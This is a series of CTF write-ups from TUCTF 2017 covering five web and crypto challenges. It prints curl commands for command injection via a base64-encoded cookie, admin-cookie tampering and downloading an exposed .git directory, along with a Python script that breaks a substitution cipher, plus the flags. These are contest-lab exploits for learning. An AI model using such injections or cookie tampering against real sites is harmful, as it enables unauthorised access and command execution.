Solution to TUCTF 2017 Cookie Harrelson

02/12/17 — capitol

tallahassee

name:

Cookie Harrelson

category:

web

points:

200

Writeup

On accessing the webpage we got this cookie: tallahassee=Y2F0IGluZGV4LnR4dA%3D%3D

Decoding that with base64 revealed that it contained the string: cat index.txt

Playing around with the cookie showed that if we changed it the string “cat index.txt#” was prepended to the supplied value and sent back.

Based on that we guessed that the server generated the webpage by executing the content of the cookie. We just needed to break out of the comment pund character and we would be able to get the flag. First we did a ls to see that the filename of the flag was flag, and then we got the flag itself.

curl 'http://cookieharrelson.tuctf.com/' -H "Cookie: tallahassee=`echo -e '\ncat flag'|base64`"
curl 'http://cookieharrelson.tuctf.com/' -H "Cookie: tallahassee=`echo -e '\ncat flag'|base64`"

Flag was TUCTF{D0nt_3x3cut3_Fr0m_C00k13s}

Solution to TUCTF 2017 Git Gud

01/12/17 — capitol

eyes

name:

Git Gud

category:

web

points:

100

Writeup

Problem was a single web page with a Git Gud meme. A request to .git showed that the .git repository was included in the deployment. And after we had downloaded the repository it was easy to find the flag in the git reflog.

wget -drc http://gitgud.tuctf.com/.git/
git reflog
git show 08cd273

flag was: TUCTF{D0nt_Us3_G1t_0n_Web_S3rv3r}

Solution to TUCTF 2017 Cookie Duty

30/11/17 — capitol

cookies

name:

Cookie Duty

category:

web

points:

50

Writeup

We were presented with a page that had a simple form to set a name. The server set a cookie named not_admin to 1 when the form was posted.

To get the flag we simply changed the cookie value to 0 and requested the page again, like this:

curl 'http://cookieduty.tuctf.com/index.php' -H 'Host: cookieduty.tuctf.com' -H 'Cookie: not_admin=0; user=dGVzdA%3D%3D'

flag was TUCTF{D0nt_Sk1p_C00k13_Duty}

Solution to TUCTF 2017 High Source

29/11/17 — capitol

high_noon

name:

High Source

category:

web

points:

25

Writeup

This was easier than trivial, only 2 steps:

  • Look at source, get password; I4m4M4st3rC0d3rH4x0rsB3w43
  • enter password be redirected to this:

curl ‘http://highsource.tuctf.com/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flagdir/flag’

flag was TUCTF{H1gh_S0urc3_3qu4ls_L0ng_F4ll}

Solution to TUCTF 2017 The Neverending Crypto

28/11/17 — capitol

CipherDisk

name:

The Neverending Crypto

category:

crypto

points:

50

Writeup

We where presented with a server that encrypted strings with a substitution cipher.

You where also able to give up to twenty characters that the server gave the solution for.

The server didn’t use the complete byte range and it was a hassle to find out what characters that was included in the substitution. The server leaked the plain texts from time to time, and the number of plain text strings that was encrypted was small, only nine different ones.

This meant that we could write some simple heuristics to decide which of the strings to send back, the same plain text character always encrypts to the same encrypted character, so we could look at what characters in the ecrypted text are equal to determine what plain text to send back.

Implemented like this:

import socket
import re
import string
 
sobj = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sobj.connect(("neverending.tuctf.com",12345))
sobj.recv(1024)
 
re_question = re.compile(r"is (?P<question>.*) decrypted")
re_match = re.compile(r"a encrypted is (?P<chr>.)")

def workit():
    sobj.send("a\n")
 
    hint =  sobj.recv(1024)
    print "hint", repr(hint)
    c = re_match.match(hint).groupdict()["chr"]
 
# What is :BB7RJBE>^R@BE8 decrypted?
    question = re_question.findall(hint)[0]
    print "Question is", question
    answer = ""
    if question[1] == question[10]:
        answer = "how many more??"
    if question[11] == question[13]:
        answer = "something here."
    if question[1] == question[5]:
        answer = "you got lucky.."
    if question[12] == question[13]:
        answer = "you have skills"
    if question[1] == question[2]:
        answer = "good work, more"
    if question[1] == question[9]:
        answer = "you crypto wiz!"
    if question[13] == question[14] and question[1] == question[10]:
        answer = "how many more??"
    if question[1] == question[13]:
        answer = "welcome, hacker"
    if question[1] == question[6] and question[1] == question[13] and question[3] == question[10]:
        answer = "dont forget to "
    if answer == "":
        print "I DO NOT KNOW"
        import sys
        sys.exit()
    print answer
    sobj.send(answer + "\n")

while True:
    workit()
    print sobj.recv(1024)